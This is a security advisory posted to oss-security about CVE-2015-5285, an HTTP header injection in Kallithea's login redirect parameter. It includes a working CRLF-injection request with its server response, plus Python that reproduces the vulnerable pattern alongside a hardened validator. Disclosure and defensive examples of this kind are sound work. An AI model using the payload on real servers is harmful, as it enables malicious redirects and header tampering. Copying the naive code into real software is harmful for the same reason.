Date: Fri, 2 Oct 2015 22:13:01 +0200
From: Andrew Shadura <andrew@...dura.me>
To: oss-security@...ts.openwall.com
Subject: CVE-2015-5285: Kallithea: HTTP header injection

HTTP header injection

Synopsis
========

A vulnerability has been found in Kallithea, allowing attackers to inject
arbitrary headers into the server response for certain URLs.

Description
===========

HTTP header injection was possible in login-related code of Kallithea,
allowing attackers to inject arbitrary headers into the server responses.

The vulnerability affects the `came_from` `GET` parameter.

Example of a malicious request:

    GET /_admin/login?came_from=1%0d%0aX-Forwarded-Host%3a%20http://zeroscience.mk%01%02%0d%0aLocation%3a%20http://zeroscience.mk HTTP/1.1
    Host: 192.168.0.28:8080
    Content-Length: 0
    Cache-Control: max-age=0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Origin: http://192.168.0.28:8080
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36
    Content-Type: application/x-www-form-urlencoded
    Referer: http://192.168.0.28:8080/_admin/login?came_from=%2F
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.8
    Cookie: kallithea=3090b35b3e37ba350d71b62c240c50bf87932f0d7e6b1a600cba4e0e890b7e29e253b438

Corresponding response:

    HTTP/1.1 302 Found
    Cache-Control: no-cache
    Content-Length: 411
    Content-Type: text/html; charset=UTF-8
    Date: Mon, 21 Sep 2015 13:58:05 GMT
    Location: http://192.168.0.28:8080/_admin/d47b5
    X-Forwarded-Host: http://zeroscience.mk
    Location: http://zeroscience.mk
    Pragma: no-cache
    Server: waitress

    <html>
     <head>
      <title>302 Found</title>
     </head>
     <body>
      <h1>302 Found</h1>
      The resource was found at <a href="http://192.168.0.28:8080/_admin/1
    X-Forwarded-Host: http://zeroscience.mk
    Location: http://zeroscience.mk ">http://192.168.0.28:8080/_admin/1
    X-Forwarded-Host: http://zeroscience.mk
    Location: http://zeroscience.mk </a>;
    you should be redirected automatically.


     </body>
    </html>

Impact
======

The bug allows an attacker to override important response headers,
possibly redirecting users to a malicious website or making other
middleware misbehave when it trusts the response headers.
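The root cause described above is a request parameter that reaches a
response header without being checked for CR/LF. The following Python
example is added here as an illustration and is not Kallithea's code or
the fix referenced below: `naive_redirect_headers` reproduces the unsafe
pattern (decoded parameter concatenated into `Location`), and
`validate_came_from` shows a hardened replacement that rejects control
characters and, going a step further than the advisory, only accepts a
site-relative path so the parameter cannot become an open redirect either.
The base URL `http://example.invalid/` and all function names are
assumptions for the example; the payload constant is the one from the
request shown above.

```python
import re
from urllib.parse import unquote, urlsplit

# The came_from value from the advisory's example request (still URL-encoded,
# as it arrives on the wire).
ADVISORY_PAYLOAD = (
    "1%0d%0aX-Forwarded-Host%3a%20http://zeroscience.mk"
    "%01%02%0d%0aLocation%3a%20http://zeroscience.mk"
)

# Any ASCII control character (CR, LF, the %01%02 bytes, NUL, ...) must never
# end up in a header value.
_CTRL_RE = re.compile(r"[\x00-\x1f\x7f]")


class UnsafeRedirectTarget(ValueError):
    """Raised when a came_from value must not be used in a Location header."""


def serialize_headers(headers):
    """Render a header list the way an HTTP/1.x server writes it: one line each.

    This is only a model of the server's behaviour, used to show how an
    unchecked value turns into extra header lines.
    """
    return "".join(f"{name}: {value}\r\n" for name, value in headers)


def naive_redirect_headers(raw):
    """The vulnerable pattern: the decoded parameter lands in Location unchecked."""
    return [("Location", "http://example.invalid/_admin/" + unquote(raw))]


def validate_came_from(raw, default="/"):
    """Return a safe redirect path for a came_from query value, or raise.

    The control-character check runs before urlsplit() on purpose: newer
    Python versions silently strip \\r and \\n inside urlsplit(), which would
    hide the injection attempt instead of rejecting it.
    """
    if not raw:
        return default
    value = unquote(raw)  # a web framework normally does this step for us
    if _CTRL_RE.search(value):
        raise UnsafeRedirectTarget("control character in came_from")
    parts = urlsplit(value)
    # Only site-relative paths: no scheme, no host, and no protocol-relative "//".
    if parts.scheme or parts.netloc or not value.startswith("/") or value.startswith("//"):
        raise UnsafeRedirectTarget("came_from must be a site-relative path")
    return value


def hardened_redirect_headers(raw):
    """Build the header list for the redirect using the validated path."""
    return [("Location", validate_came_from(raw)), ("Cache-Control", "no-cache")]


def header_block_is_clean(headers):
    """Last line of defence before start_response(): no CR or LF in any value."""
    return all("\r" not in value and "\n" not in value for _, value in headers)


if __name__ == "__main__":
    print(repr(serialize_headers(naive_redirect_headers(ADVISORY_PAYLOAD))))
    try:
        hardened_redirect_headers(ADVISORY_PAYLOAD)
    except UnsafeRedirectTarget as exc:
        print("rejected:", exc)
```

Running the script shows the naive serialization splitting into three
header lines, while the hardened builder refuses the same input. The
`header_block_is_clean` check is cheap enough to keep as a final assertion
in any code path that assembles headers from request data, independent of
which validator produced them.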

Resolution
==========

The Kallithea project has fixed this issue in the stable branch. Users
are recommended to upgrade to the latest 0.3 release.

Affected versions
=================

The issue is present in Kallithea versions before 0.3.

Acknowledgments
===============

Thanks to Gjoko Krstic of Zero Science Lab for reporting this issue.

References
==========

[0] Kallithea Project
    <https://kallithea-scm.org/>

[1] CVE-2015-5285
    <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5285>

[2] Kallithea: Security Notice CVE-2015-5285
    <https://kallithea-scm.org/security/cve-2015-5285.html>

[3] Mercurial changeset fixing the issue
    <https://kallithea-scm.org/repos/kallithea/changeset/38d1c99cd0005c1df5a37692615356c918dbe068>

[4] Zero Science Lab
    <http://www.zeroscience.mk/en/>

-- 
Cheers,
  Andrew Shadura
  on behalf of Kallithea Security Team

